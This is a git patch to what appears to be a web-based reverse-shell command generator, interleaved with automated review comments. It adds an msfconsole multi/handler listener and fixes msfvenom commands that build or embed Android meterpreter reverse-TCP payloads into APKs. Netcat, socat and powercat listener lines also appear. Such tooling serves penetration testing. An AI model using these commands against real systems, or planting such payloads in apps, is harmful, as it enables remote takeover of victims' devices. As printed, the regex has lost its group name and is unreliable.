From fe8ffde2996f6615e2196eb49cdaa540bdc224eb Mon Sep 17 00:00:00 2001 From: epi Date: Sun, 4 Apr 2021 14:37:06 -0500 Subject: [PATCH] added msfconsole listeners; minor bugfixes for msf payloads --- js/data.js | 7 ++++--- js/script.js | 18 ++++++++++++++++++ 2 files changed, 22 insertions(+), 3 deletions(-) diff --git a/js/data.js b/js/data.js index 60e4cd1..a0d7bca 100644 --- a/js/data.js +++ b/js/data.js @@ -327,12 +327,12 @@ const msfvenomCommands = withCommandType( }, { "name": "Android Meterpreter Reverse TCP", - "command": "msfvenom -a x64 --platform android –p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk", + "command": "msfvenom -a x64 --platform android -p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk", "meta": ["msfvenom", "android", "android", "reverse"] }, { "name": "Android Meterpreter Embed Reverse TCP", - "command": "msfvenom -a x64 --platform android -x android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk", + "command": "msfvenom -a x64 --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk", "meta": ["msfvenom", "android", "android", "reverse"] }, { @@ -357,7 +357,8 @@ const rsgData = { ['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'], ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'], ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], - ['powercat', 'powercat -l -p {port}'] + ['powercat', 'powercat -l -p {port}'], + ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'] ], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'], diff --git a/js/script.js b/js/script.js index 23ae4f1..63a226f 100644 --- a/js/script.js +++ b/js/script.js 
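Review bot: The new msfconsole entry puts `{ip}` and `{payload}` inside a double-quoted `-x` argument whose console commands are separated by `;`, so a stray `"` or `;` in a substituted value changes the command the user pastes into their own terminal. `getPayload` in js/script.js only ever returns characters from `[a-zA-Z0-9/_]`, but no comparable check on the IP value is visible in this patch. Validate the IP before substitution and record the contract next to the data, for example `// Placeholders: {port}, {ip}, {payload}; substituted values must not contain quotes or ';'`. The `listenerCommands` array starts outside the hunk.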
@@ -80,6 +80,7 @@ const rsg = { ip: localStorage.getItem('ip') || '10.10.10.10', port: localStorage.getItem('port') || 9001, + payload: localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp', shell: localStorage.getItem('shell') || rsgData.shells[0], listener: localStorage.getItem('listener') || rsgData.listenerCommands[0][1], encoding: localStorage.getItem('encoding') || 'None', @@ -137,6 +138,21 @@ return reverseShellData.command; }, + getPayload: () => { + if (rsg.commandType === 'MSFVenom') { + let cmd = rsg.getReverseShellCommand(); + // msfvenom -p windows/x64/meterpreter_reverse_tcp ... + let regex = /\s+-p\s+(?[a-zA-Z0-9/_]+)/; + let match = regex.exec(cmd); + if (match) { + return match.groups.payload; + } + } + + return 'windows/x64/meterpreter/reverse_tcp' + + }, + generateReverseShellCommand: () => { let command @@ -306,6 +322,8 @@ let command = listenerSelect.value; command = rsg.highlightParameters(command) command = command.replace('{port}', rsg.getPort()) + command = command.replace('{ip}', rsg.getIP()) + command = command.replace('{payload}', rsg.getPayload()) if (rsg.getPort() < 1024) { privilegeWarning.style.visibility = "visible";
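Review bot: The added `payload` field on `rsg` looks unused: `getPayload` in the next hunk never reads `rsg.payload`, and nothing visible in this patch writes a `payload` key to localStorage. The default `'windows/x64/meterpreter/reverse_tcp'` is also repeated verbatim in `getPayload`, so the two can drift apart. Either make the fallback `return rsg.payload;` or drop the field, and keep the default in one constant. If the stored value is ever returned, check it against the same `[a-zA-Z0-9/_]` class first, since localStorage content would otherwise flow unvalidated into the listener command. The `rsg` object continues outside the hunk, so a reader of the field may exist elsewhere.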
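Review bot: As shown, the pattern `(?[a-zA-Z0-9/_]+)` has no group name although the following lines read `match.groups.payload`. The name was probably lost when the page was rendered; the pattern must read `(?<payload>[a-zA-Z0-9/_]+)` to parse. `getPayload` also lacks a comment recording that the character class is what keeps quotes, semicolons and markup out of the listener string, for example `// Only [a-zA-Z0-9/_] can match, so the extracted name is safe to splice into the listener command`. `cmd`, `regex` and `match` are never reassigned and should be `const`, and the final `return` is missing its semicolon.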
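Review bot: The new `{ip}` and `{payload}` substitutions run after `rsg.highlightParameters(command)`, so the raw values are spliced into a string that presumably already carries highlight markup. If that string is later assigned through `innerHTML` (not visible in this hunk), the result of `rsg.getIP()` needs HTML-escaping first, or the node should be built with `textContent`. A string passed as the replacement argument also has `$&`, `$1` and similar sequences interpreted, so a replacer function is safer: `command = command.replace('{ip}', () => rsg.getIP())`. The enclosing handler starts and ends outside the hunk.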